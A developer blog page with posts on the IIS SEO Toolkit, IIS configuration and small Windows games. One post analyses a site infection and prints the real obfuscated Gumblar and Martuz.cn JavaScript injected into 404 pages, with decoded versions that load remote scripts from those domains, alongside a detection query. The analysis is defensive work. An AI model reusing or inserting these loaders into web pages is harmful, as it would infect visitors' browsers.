Posts
  • CarlosAg Blog

    Backgammon and Connect4 for Windows Mobile

    • 5 Comments

    During the holidays my wife and I went back to visit our families in Mexico City where we are originally from. Again, during the flights I had enough spare time to build a couple of my favorite games, Backgammon and Connect4.

    I had already built both games for Windows using Visual Basic 5 almost 11 years ago, but as you would imagine I was far from proud of that implementation. So this time I started from scratch and ended up with what I think are better versions of them (still not the best code, but pretty decent for just a few hours of coding). In fact the AI in the Backgammon version is a bit better, and the Connect4 version is faster and more suited for a mobile device.

    You can go with your PDA/Smartphone to http://www.carlosag.net/mobile/ to install both games, or just click the images below to go to the install page for each of them. Enjoy, and feel free to add any feedback or feature requests as comments to this blog post.

    The one thing I learned during the development of these versions is that you do want to download the Windows Mobile 6 SDK if you are going to target that version (which is what my cell phone runs), since it adds new Visual Studio 2005 project templates and new emulator images that help a lot. For example, I was trying to use buttons in my forms, and testing in the Pocket PC emulator worked, but as soon as I tried them on my cell phone it crashed with a NotSupportedException. Once I installed the SDK and switched to target that platform, Visual Studio immediately warned me that my platform didn't support buttons, which was great.

    Bottom line, I'm more and more amazed at how easy it is to build games for Windows Mobile and at the things you can achieve with both Windows Mobile and the .NET Compact Framework.

  • CarlosAg Blog

    Announcing: IIS SEO Toolkit v1.0.1

    • 5 Comments

    Last week we released a refresh for the IIS Search Engine Optimization (SEO) Toolkit v1.0. This version is a minor update that includes fixes for all the important bugs reported in the IIS.NET SEO Forum.

    Some of the fixes included in this version are:

    1. Pages sending the XHTML content type 'application/xhtml+xml' are not parsed correctly as HTML causing their links and violations to be empty.
    2. Report Analysis fails if the META tags include certain characters.
    3. <style> tag is not parsed correctly if it is empty causing Invalid Markup violations to be flagged incorrectly.
    4. Memory is not released when the "Store Copies of analyzed web pages locally" button is unchecked.
    5. HTML with leading empty lines and doctype fails to parse correctly causing their links and violations to be empty.
    6. Internal Link criteria option of "host: <sitename> and subdomains (*.<sitename>)" fails to work as expected under certain configurations.
    7. System.NullReferenceException when the content attribute is missing in a META tag.
    8. Windows authentication does not work with servers configured with NTLM or Kerberos only challenge.
    9. External META tags are stored in the report making it cumbersome to use the important ones.
    10. Several localization related bugs.
    11. DTD error when navigating to the Sitemap and Sitemap Index User Interface.
    12. And others…

    This release is compatible with v1.0 RTM and will upgrade it if already installed. So go ahead and install the new version using the Web Platform Installer by clicking: http://go.microsoft.com/?linkid=9695987

     

    Learn more about it at: http://www.iis.net/expand/SEOToolkit

  • CarlosAg Blog

    IIS SEO Toolkit and W3C Validation Service

    • 4 Comments

    One thing that I’ve been asked several times about the SEO Toolkit is whether it does a full standards validation on the markup and content that is processed, and if not, whether we could add support for more comprehensive standards validation, in particular XHTML and HTML 4.01. Currently the markup validation performed by the SEO Toolkit is really simple; its main goal is to make sure that the markup is correctly organized, for example that things like <b><i>Test</b></i> are not found in the markup. The primary reason is to make sure that basic blocks of markup are generally "easy" for Search Engines to parse and that the semantics will not be terribly broken if a link, text or style is not correctly closed (since all of those would affect SEO).
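    Just to illustrate the kind of structural check described above, here is a minimal sketch (not the Toolkit's actual implementation, and the helper name is made up) that flags improperly nested tags with a simple stack:

    // Minimal sketch, not the SEO Toolkit's code: flags improperly nested tags
    // such as <b><i>Test</b></i> by requiring each closing tag to match the most
    // recently opened tag. Void and self-closing elements are skipped, and
    // unclosed tags are ignored, since this only illustrates the idea.
    using System.Collections.Generic;
    using System.Text.RegularExpressions;

    static class NestingCheck {
        static readonly Regex Tag = new Regex(@"<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>");
        static readonly HashSet<string> Void = new HashSet<string> {
            "br", "hr", "img", "meta", "link", "input", "area", "base", "col", "source", "wbr"
        };

        public static bool IsProperlyNested(string html) {
            Stack<string> open = new Stack<string>();
            foreach (Match m in Tag.Matches(html)) {
                bool closing = m.Groups[1].Value == "/";
                string name = m.Groups[2].Value.ToLowerInvariant();
                if (!closing) {
                    if (!Void.Contains(name) && !m.Value.EndsWith("/>")) {
                        open.Push(name);
                    }
                } else if (open.Count == 0 || open.Pop() != name) {
                    return false; // closing tag does not match the last opened tag
                }
            }
            return true;
        }
    }

    // For example, IsProperlyNested("<b><i>Test</b></i>") returns false.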

    So the first thing I would say is that we have heard the feedback and are looking at what we could possibly add in future versions. However, why wait, right?

    One thing that many people do not realize is that the SEO Toolkit can be extended to add new violations, new metadata and new rules to the analysis process. So during a demo I gave a few weeks ago, I decided to write a sample that consumes the online W3C Markup Validation Service from the SEO Toolkit.

    Download

    You can download the SEOW3Validator including the source code at http://www.carlosag.net/downloads/SEOW3Validator.zip.

    How to install it

    To run it you just need to:

    1. Unzip the contents in a folder.
    2. Install the SEOW3Validator.dll assembly in the GAC:
      1. Open a Windows Explorer window and navigate to c:\Windows\assembly
      2. Drag and Drop the SEOW3Validator.dll to the c:\Windows\assembly explorer window.
      3. Alternatively you can just run gacutil.exe /i SEOW3Validator.dll, usually located at C:\Program Files\Microsoft SDKs\Windows\v6.0A\bin or v7A.
      4. If you have problems with this, you could try just copying the assembly to the GAC (copy SEOW3Validator.dll c:\Windows\assembly\GAC_MSIL\SEOW3Validator\1.0.0.0__995ee9b8fa017847\SEOW3Validator.dll)
    3. Register the moduleProvider in Administration.config: in an elevated prompt open C:\Windows\System32\Inetsrv\config\Administration.config and add the following line inside the <moduleProviders> section, right before the closing </moduleProviders>:

       <add name="SEOW3Validator" type="SEOW3Validator.SEOW3ValidatorModuleProvider, SEOW3Validator, Version=1.0.0.0, Culture=neutral, PublicKeyToken=995ee9b8fa017847" />

    You should now be able to run the SEO Toolkit just as before, but you will find new violations; for example, on my site I get the ones below. Notice that there is a new set of violations like W3 Validator – 68, etc., and all of them belong to the W3C category. (I would have liked to have better names, but the way the W3C API works is not really friendly for making this any better.)

    SampleValidatorResults

    And when double clicking any of those results you get the details as reported by the W3 Validation Service:

    SampleValidatorDetails

    The Code

    The code is actually pretty simple. The main class is called SEOW3ValidatorExtension; it derives from CrawlerModule and overrides the Process method to call the W3C Validation Service, sending the actual markup in the request. This means it does not matter whether your site is on an intranet or on the Internet, it will work; and for every warning and error returned by the validator it adds a new violation to the SEO report.

    The code looks like this:

    W3Validator validator = new W3Validator();
    W3ValidatorResults results = validator.Validate(context.UrlInfo.FileName,
                                                    context.UrlInfo.ContentTypeNormalized,
                                                    context.UrlInfo.Response);

    foreach (W3ValidatorWarning warning in results.Warnings) {
        context.UrlInfo.AddViolation(CreateWarning(warning));
    }

    foreach (W3ValidatorError error in results.Errors) {
        context.UrlInfo.AddViolation(CreateError(error));
    }

    I created a helper class, W3Validator, that basically encapsulates the consumption of the W3C Validation Service. The code is far from what I would like it to be; there are some "interesting" decisions in the way the API is exposed. I would probably have designed the service differently and not returned the results formatted as HTML, since this is an API/Web Service whose output may be presented somewhere other than a browser. So a lot of the code just re-formats the results to look "decent", but to be honest I did not want to spend too much time on it, so everything was put together quite quickly. Also, if you look at the names I used for the violations, I did not want to hard-code specific Message IDs, and since the error message was different even within the same Message ID, it was not easy to provide better messages. Anyway, overall it is pretty usable and should be a good way to do W3C validation.
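    For reference, here is a minimal sketch of how markup can be sent to the online validator. This is not the W3Validator code shipped in the sample; the 'fragment' and 'output' parameters and the X-W3C-Validator-* response headers come from the service's public documentation, so verify them there before relying on them:

    // Minimal sketch only: posts markup to the public W3C validator and reads the
    // summary headers. Parameter and header names are taken from the service's
    // public documentation, not from the sample's W3Validator class.
    using System;
    using System.Collections.Specialized;
    using System.Net;
    using System.Text;

    static class W3ValidatorSketch {
        public static void Validate(string markup) {
            using (WebClient client = new WebClient()) {
                NameValueCollection form = new NameValueCollection();
                form["fragment"] = markup;   // the markup to validate
                form["output"] = "soap12";   // ask for a machine-readable response

                byte[] response = client.UploadValues("http://validator.w3.org/check", form);

                // Summary headers: overall status and error count.
                Console.WriteLine("Status: " + client.ResponseHeaders["X-W3C-Validator-Status"]);
                Console.WriteLine("Errors: " + client.ResponseHeaders["X-W3C-Validator-Errors"]);

                // The SOAP body contains the individual warnings and errors that the
                // real helper turns into SEO Toolkit violations.
                Console.WriteLine(Encoding.UTF8.GetString(response));
            }
        }
    }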

    Note that one of the cool things you get for free is that, since these are stored as violations, you can re-run the report and use the Compare Report feature to see your progress while fixing them. Also, since they are stored as part of the report, you will not need to keep running the validator over and over again; instead you can just open the report and continue looking at them, analyze the data in the Reports and Queries, export them to Excel, etc.

    Hopefully this gives you a good example of some of the interesting things you can achieve with the SEO Toolkit and its extensibility.

  • CarlosAg Blog

    Free Sudoku Game for Windows

    • 4 Comments

    A couple of years ago a friend of mine introduced me to a game called Sudoku, and I immediately loved it. As with any good game, its rules are very simple: you have to lay out the numbers 1 to 9 in each row without repeating them, while at the same time laying out the same 1 to 9 numbers in each column and also within each group (a 3x3 square).
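    Just to illustrate those three constraints (this is only a sketch, not the game's code), a completed board is valid when every row, column and 3x3 group contains each digit exactly once:

    // Minimal sketch, not the game's implementation: checks that a completed
    // 9x9 grid satisfies the Sudoku rules described above.
    static bool IsValidSolution(int[,] grid) {
        for (int i = 0; i < 9; i++) {
            bool[] row = new bool[10], col = new bool[10], box = new bool[10];
            for (int j = 0; j < 9; j++) {
                int r = grid[i, j];                                     // j-th value of row i
                int c = grid[j, i];                                     // j-th value of column i
                int b = grid[3 * (i / 3) + j / 3, 3 * (i % 3) + j % 3]; // j-th value of box i
                if (r < 1 || r > 9 || c < 1 || c > 9 || b < 1 || b > 9) return false;
                if (row[r] || col[c] || box[b]) return false;           // a digit repeats
                row[r] = col[c] = box[b] = true;
            }
        }
        return true;
    }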

    After that, every time I had to take a flight I got addicted to buying a new puzzle magazine to entertain me during the flight. In December 2006, while flying to Mexico, I decided to change the tradition and instead build a simple Sudoku game that I could play any time I felt like it, without having to find a magazine store, and that turned into this simple game. It is not yet a great game since I haven't had time to finalize it, but I figured I would share it anyway in case someone finds it fun.

    Click Here to go to the Download Page

    Sudoku

  • CarlosAg Blog

    Canonical Formats and Query Strings - IIS SEO Toolkit

    • 4 Comments

    Today somebody was running the IIS SEO Toolkit, and the Site Analysis feature flagged a lot of violations saying "The page contains multiple canonical formats." The reason apparently is that he uses query string parameters to pass contextual or other information between pages. This of course raises the question: does that mean query strings in general are bad news SEO-wise?

    Well, the answer is not necessarily.

    I will start by clarifying that this violation in Site Analysis means our algorithm detected that two URL's look like the same content; note that we make no assumptions based on the URL itself (including query string parameters). This kind of situation is bad for a couple of reasons:

    1. Based on the fact that they look like the same page, Search Engines will probably choose one of them, index it as the real content and discard the other one. The problem is that you are leaving this decision to the Search Engines, which means some might choose the wrong version and end up using the one with query string parameters instead of the clean one (not likely, though), or even worse, they might end up indexing both of them as if they were different.
    2. When other Web sites look at your content and add links to it, some of them might end up using the URL with the extra query string parameters and some of them not. What this means is that organic linking will not give you the benefits it otherwise would. Remember, Search Engines give you "extra" points when somebody external references your page, but now you'll be splitting the earnings between "two pages" instead of a single canonical form.

    Query strings by themselves do not pose a terrible threat to SEO; most modern Search Engines deal with query strings just fine. However, it is the organic linking and the potential abuse of query strings that can give you headaches.

    Remember, Search Engines should make no assumptions based on the fact that a single "page" serves tons of content through a single absolute path and the use of query strings. This is typical in many cases, such as when using index.php, where pretty much every page on the site is served by the same resource using just variations of query strings or path information.

     

    So what should I do?

    Well, there are several things you could do, but probably one of the easiest is to just tell Search Engines (more specifically crawlers or bots) not to index pages that have the different query string variations that are really only meant for the application to pass state and not to specify different content. This can be done using the Robots Exclusion Protocol, with wildcard matching to say that any URL containing a '?' should not be followed. Note that you should make sure you are not blocking URL's that actually are supposed to be indexed. For this you can run the Site Analysis feature again; it will flag an informational message for each URL that is not visited due to the robots exclusion file.

    User-agent: *
    Disallow: /*?

     

    In summary, try to keep canonical formats yourself; don't leave any guessing to Search Engines, because some of them might get it wrong. There is a new way of specifying the canonical form in your markup, using the new rel="canonical" link, but it is "very recent" (as in 2009) and some Search Engines do not support it (I believe the top three do, though):

    <link rel="canonical" href="http://www.my-site.com/my-canonical-url" />

    In the Beta 2 version of the IIS SEO Toolkit we will support this tag and have better detection of these canonical issues. So stay tuned.

    Another way to solve this is to use URL Rewrite so that you can easily redirect or rewrite your URL's to get rid of the query strings and use more SEO-friendly URL's.

  • CarlosAg Blog

    Announcing: IIS SEO Toolkit v1.0 release

    • 3 Comments

    Today we are announcing the final release of the IIS Search Engine Optimization (SEO) Toolkit v1.0. This version builds upon the Beta 1 and Beta 2 versions and is 100% compatible with them, so any report you currently have continues to work in the new version. The new version includes a set of bug fixes and new features, such as:

    1. Extensibility. In this version we are opening a new set of API's to allow you to develop extensions for the crawling process, including the ability to augment the metadata in the report with your own, extend the set of tasks provided in the Site Analysis and Sitemaps user interface, and more. More on this in an upcoming post.
    2. New Reports. Based on feedback, we added a Redirects summary report in the Links section as well as a new Link Depth report that lets you easily see which pages are the "most hidden" pages in your site, or in other words, if a user landed at your site's home page, how many clicks they need to reach a particular page.
    3. New Routes Query. We added a new type of query called Routes. This is the underlying data that powers the Link Depth report mentioned above; however, it is also exposed as a new query type so that you can create your own queries, customize the start page, and apply any other kind of operation like filtering, grouping, etc.
    4. New option to opt out of keeping a local cache of files. We added a new switch in the "Advanced Settings" of the New Analysis dialog to disable keeping the files stored locally. This lets you run a report that runs faster and consumes a lot less disk space than when keeping the files cached. The only side effect is that you will not be able to use the Content tab, the contextual position of the links, or the Word Analysis feature. Everything else continues to work just as in any other report.
    5. HTML metadata is now stored in the report. By leveraging the extensibility mentioned in bullet 1, the HTML parser now stores the content of all the HTML META tags so that you can later use them to write your own queries, whether to filter, group, or just export the data. This gives you a very interesting set of options if you have any metadata like Author or anything custom.
    6. Several Bug Fixes:
      1. Internal URLs linked by External URLs now are also included in the crawling process.
      2. Groupings in queries should be case sensitive
      3. Show contextual information (link position) in Routes
      4. The Duplicate detection logic should only include valid responses (do not include 404 NOT Found, 401, etc)
      5. Canonical URLs should support sub-domains.
      6. Several Accessibility fixes. (High DPI, Truncation in small resolutions, Hotkeys, Keyboard navigation, etc).
      7. Several fixes for Right-To-Left languages. (Layout and UI)
      8. Help shortcuts enabled.
      9. New Context Menus for Copying content
      10. Add link position information for Canonical URLs
      11. Remove x-javascript validation for this release
      12. Robots algorithm should be case sensitive
      13. many more

    This version can upgrade both the Beta 1 and Beta 2 versions, so go ahead and try it, and PLEASE provide us with feedback and any additional things you would like to see in the next version at the SEO Forum on the IIS Web site.

    Click here to install the IIS SEO Toolkit.

  • CarlosAg Blog

    IIS SEO Tip - Do not stress your server, limit the number of concurrent requests

    • 3 Comments

    The other day somebody asked me if there was a way to limit the amount of work that Site Analysis in the IIS SEO Toolkit causes on the server. This is interesting for a couple of reasons:

    • You might want to reduce the load that Site Analysis causes on your server at any given time.
    • You might have a denial-of-service detection system, such as our Dynamic IP Restrictions IIS module, that will start failing requests based on the number of requests in a certain amount of time.
    • Or, if like me you have to go through a proxy, it might have a configured limit on the number of requests per minute you are allowed to issue.

    In Beta 1 we do not support the Crawl-delay directive of the Robots Exclusion Protocol; in future versions we will look at adding support for this setting. The good news is that Beta 1 does have a configurable setting that can help you achieve these goals, called Maximum Number of Concurrent Requests.

    To set it:

    1. Go to the Site Analysis Reports page
    2. Select the option "Edit Feature Settings..." as shown in the next image.
      EditFeatureSettings
    3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option, which you can set to any value from 1 to 16. The default value is 8, which means that at any given time we will issue at most 8 requests to the server.
      MaxConcurrentRequests
  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit

    • 3 Comments

    The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. The designer downloaded the HTML pages and looked for anything suspicious in them, but was not able to find anything. My friend then went back to his hosting provider, mentioned that they had not been able to find anything problematic, and asked whether it could be something with the server configuration, to which they replied sarcastically that it was probably ignorance on the part of his Web site designer.

    Enter IIS SEO Toolkit

    So of course the first thing I decided to do was crawl the Web site using Site Analysis in the IIS SEO Toolkit. This gave me a list of the pages and resources in his Web site. The first thing I knew is that malware usually hides either in executables or in scripts on the server, so I started looking at the different content types shown in the "Content Types Summary" inside the Content reports on the dashboard page.

    img01

    I was surprised not to find a single executable and to see only two very simple JavaScript files, which did not look like malware in any way. Based on previous knowledge, I knew that malware in HTML pages usually hides behind a funky-looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for the HTML pages that contain the word eval and also contain the word unescape. I know there are valid scripts that include those features, since they exist for a reason, but it was a good way to start scoping the pages.

    Gumblar and Martuz.cn Malware on sight

    img02

    After running the query as shown above, I got a set of HTML files, all of which gave a status code 404 – NOT FOUND. Double-clicking any of them and looking at the HTML markup content made it immediately obvious they were malware infected; look at the following markup:

    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    -->
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
     
    --></script><BODY>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at **********
    </ADDRESS>
    </BODY>
    </HTML>

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

    For those of you who, like me, do not particularly enjoy reading encoded JavaScript, what these two scripts do is just unescape the funky-looking string and then execute it. I have decoded the script that would get executed and shown it below, just to showcase how this malware works. Note how they special-case a couple of browsers, including Chrome, to then request a particular script that causes the real damage.

    var a = "ScriptEngine",
        b = "Version()+",
        j = "",
        u = navigator.userAgent;
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
        zrvzts = "A";
        eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
        document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>");
    }

    And:

    var a = "ScriptEngine",
        b = "Version()+",
        j = "",
        u = navigator.userAgent;
    if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
        zrvzts = "A";
        eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
        document.write("<script src=//martuz.cn/vid/?id=" + j + "><\/script>");
    }

    Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.

    Final data

    Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web application; the infection is in the error pages being served by the server when an error happens. As a next step, to be able to guide them with more specifics, I needed to determine which Web server they were using. Doing that is as easy as inspecting the response headers in the IIS SEO Toolkit, which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With the big disclaimer that I know nothing about Apache, I then guided them to look at their .htaccess file and the httpd.conf file for ErrorDocument directives, which would show them which files were infected and whether it was a problem in their application or on the server.

    Case Closed

    It turns out that after they went back to their hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. The IIS SEO Toolkit helped me quickly identify this because it sees the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of the IIS SEO Toolkit you can expect to be able to find this kind of thing in much simpler ways, but for Beta 1, for those who care, here is the query that you can save in an XML file and use "Open Query" with to see if you are infected with this malware.

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
      <filter>
        <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
        <expression field="FileContents" operator="Contains" value="unescape" />
        <expression field="FileContents" operator="Contains" value="eval" />
      </filter>
      <displayFields>
        <field name="URL" />
        <field name="StatusCode" />
        <field name="Title" />
        <field name="Description" />
      </displayFields>
    </query>
  • CarlosAg Blog

    Extending the IIS Configuration System using COM

    • 3 Comments

    Today I was going to post about extending the IIS configuration system, in particular about a feature that not everybody knows about which allows you to extend the IIS configuration system using dynamic code. What this means is that instead of hard-coding the configuration using XML in a .config file, your configuration can be provided by a COM object that implements IAppHostPropertyExtension, IAppHostElementExtension and IAppHostMethodExtension.

    Then, just to make sure I was not repeating what somebody else had already said, I searched for this on live.com (worth saying: excellent results, the first hit is the documentation of the interfaces, the second hit is an excellent article on iis.net).

    So instead of repeating what you can already find in those places on IIS.NET, I decided not to blog about it in detail, but instead mention some of the things that are not covered there.

    This dynamic configuration is great and offers lots of interesting possibilities, since it allows you to expose any arbitrary code so that it is immediately accessible through all of our configuration API's, including Microsoft.Web.Administration, AHADMIN, etc., giving your end users a common programming paradigm. In fact, this also means that it is immediately accessible to the UI API's and even to the new Configuration Editor in the Admin Pack.

    Another interesting benefit is that through these API's your code can be called remotely, so it can be scripted to manage machines remotely without the need to write any serialization or complex remoting infrastructure (restrictions might apply).

    However, one thing that is also important to mention is that these dynamic configuration extensions are only available to administration tools, meaning you cannot access these extensions from the worker process by default. To clarify, you cannot use the worker process configuration instance to invoke these extensions, since the worker process specifically disables the ability to call them in its configuration instance. However, if you create your own instance of Microsoft.Web.Administration.ServerManager (which requires you to be running in Full Trust) you will be able to, and you can also create your own instance of Microsoft.ApplicationHost.AdminManager and access them that way. In both cases this will only work if you are an Administrator on the machine or have read ACL's for the ApplicationHost.config file (which by default is only readable by Administrators). This is why methods like Microsoft.Web.Administration.WebConfigurationManager::GetSection (and CoGetObject for AHADMIN) are provided, so you don't run into these issues when developing Web applications and are still able to read configuration sections from your worker process without requiring administrative privileges (in MWA, provided you either are in Full Trust or the section definition marks it as requirePermission=false).

    To understand some scenarios better, it is worth mentioning that in IIS 7.0 we actually use these API's to provide easy access to runtime information and other tasks; for example, querying the state of a site, recycling an application pool, assigning an SSL certificate to a binding, and stopping a site are all provided through this mechanism. If you want to see all the things we do this way, just open %windir%\System32\Inetsrv\config\schema\rscaext.xml, where all of our Web server extensions are declared. Our own FTP Server for IIS 7.0 uses the same mechanism for things like querying sessions and other cool stuff.
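    As a quick illustration, the same runtime information and operations surface through Microsoft.Web.Administration like regular configuration. This is only a sketch with placeholder site and pool names, and it must run with administrative privileges:

    using System;
    using Microsoft.Web.Administration;

    class DynamicConfigSample {
        static void Main() {
            // Requires administrative privileges: ServerManager reads
            // ApplicationHost.config, where the dynamic extensions are exposed.
            using (ServerManager manager = new ServerManager()) {
                // "Default Web Site" and "DefaultAppPool" are just placeholder names.
                Site site = manager.Sites["Default Web Site"];
                Console.WriteLine("Site state: " + site.State);     // backed by a dynamic property

                ApplicationPool pool = manager.ApplicationPools["DefaultAppPool"];
                pool.Recycle();                                      // backed by a dynamic method
            }
        }
    }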

    Anyway, feel free to give the IIS.NET article a good read; it is quite good.

    http://www.iis.net/articles/view.aspx/IIS7/Extending-IIS7/Extending-IIS7-Configuration/Configuration-Extensibility

  • CarlosAg Blog

    Mapping a different file extension for ASPX Pages in IIS 7.0

    • 3 Comments

    Today I read a question in one of the IIS.NET forums - although I'm not sure this is what they really wanted to know - and I figured it might be useful to explain how to do this anyway. Users often do not like exposing their ASP.NET pages using the default .aspx file extension, sometimes for legacy reasons (trying to minimize the risk of generating broken links when moving from a different technology, or to preserve the validity of previous search engine indexes), and sometimes for a false sense of security or whatever.

    Regardless of why, the bottom line is that mapping a different file extension so it behaves just like any other ASP.NET page requires you to add a couple of entries in configuration, especially if you want it to work in both pipeline modes, Classic and Integrated.

    For this exercise, let's assume you want to assign the file extension .IIS so that such files get processed as ASPX pages, and that you only want this to be applicable to the Default Web Site and its applications.

    The following Web.Config file will enable this to work for both Pipeline Modes:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <system.webServer>
        <handlers>
          <add name="ASPNETLikeHandler-Classic" path="*.iis" verb="GET,HEAD,POST,DEBUG" modules="IsapiModule" scriptProcessor="C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv2.0,bitness32" />
          <add name="ASPNETLikeHandler" path="*.iis" verb="GET,HEAD,POST,DEBUG" type="System.Web.UI.PageHandlerFactory" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />
        </handlers>
        <validation validateIntegratedModeConfiguration="false" />
      </system.webServer>
      <system.web>
        <compilation>
          <buildProviders>
            <add extension=".iis" type="System.Web.Compilation.PageBuildProvider" />
          </buildProviders>
        </compilation>
        <httpHandlers>
          <add path="*.iis" type="System.Web.UI.PageHandlerFactory" verb="*" />
        </httpHandlers>
      </system.web>
    </configuration>

    The following command lines use AppCmd.exe to enable this for both pipeline modes and basically generate the .config file above.


    echo To make it work in integrated mode
    appcmd.exe set config "Default Web Site" -section:system.webServer/handlers /+"[name='ASPNETLikeHandler',path='*.iis',verb='GET,HEAD,POST,DEBUG',type='System.Web.UI.PageHandlerFactory',modules='ManagedPipelineHandler',requireAccess='Script',preCondition='integratedMode']"
    appcmd.exe set config "Default Web Site" -section:system.web/compilation /+"buildProviders.[extension='.iis',type='System.Web.Compilation.PageBuildProvider']"

    echo To make it work in classic mode
    appcmd.exe set config "Default Web Site" -section:system.webServer/handlers /+"[name='ASPNETLikeHandler-Classic',path='*.iis',verb='GET,HEAD,POST,DEBUG',modules='IsapiModule',scriptProcessor='%windir%\Microsoft.NET\Framework\v2.0.50727\aspnet_isapi.dll',requireAccess='Script',preCondition='classicMode,runtimeVersionv2.0,bitness32']"

    appcmd.exe set config "Default Web Site" -section:system.web/httpHandlers /+"[path='*.iis',type='System.Web.UI.PageHandlerFactory',verb='*']"

    appcmd.exe set config "Default Web Site" -section:system.web/compilation /+"buildProviders.[extension='.iis',type='System.Web.Compilation.PageBuildProvider']"

    appcmd.exe set config "Default Web Site" -section:system.webServer/validation /validateIntegratedModeConfiguration:"False"

    So what does this actually do?

    Let's walk through the AppCmd.exe lines, since they break down the different operations nicely.

    1. Integrated Mode. When running in Integrated mode, conceptually only the IIS pipeline gets executed and not the ASP.NET pipeline, which means that the httpHandlers section (in system.web) is actually not used at all.
      1. So just by adding a new handler (ASPNETLikeHandler above) to system.webServer/handlers, IIS will see this extension and correctly execute the page. Note that we use the preCondition attribute to tell IIS that this handler should only be used when we are running in an Integrated pipeline application pool.
      2. The second line only tells the ASP.NET compilation infrastructure how to deal with files with this extension so that it can compile it as needed.
    2. Classic Mode. In Classic mode the ASP.NET pipeline keeps running as in previous versions of IIS, as a simple ISAPI, and the new IIS pipeline gets executed as well. This means that we first need to tell IIS to route the request to the ASP.NET ISAPI, and then we need to tell ASP.NET how to handle this extension as well, using system.web/httpHandlers to process the request.
      1. The first line adds a handler (ASPNETLikeHandler-Classic above) to IIS so that IIS correctly routes this request to aspnet_isapi.dll. Note that in this case we also use the preCondition attribute to tell IIS that this only applies when running in an application pool in Classic mode; furthermore, we also use it to specify that it should only be used in an application pool running in 32-bit mode and using version 2.0 of the runtime. If you also wanted to support 64-bit application pools, you would add another handler pointing to the 64-bit version of aspnet_isapi.dll in the Framework64 folder and use bitness64 instead.
      2. The second line tells ASP.NET that the .iis extension is handled by the PageHandlerFactory, so that the ASP.NET pipeline understands what to do when a file with the .iis extension is requested.
      3. Again, just as in step 2 of the Integrated mode case, we need to tell the ASP.NET compilation infrastructure how to deal with this extension.
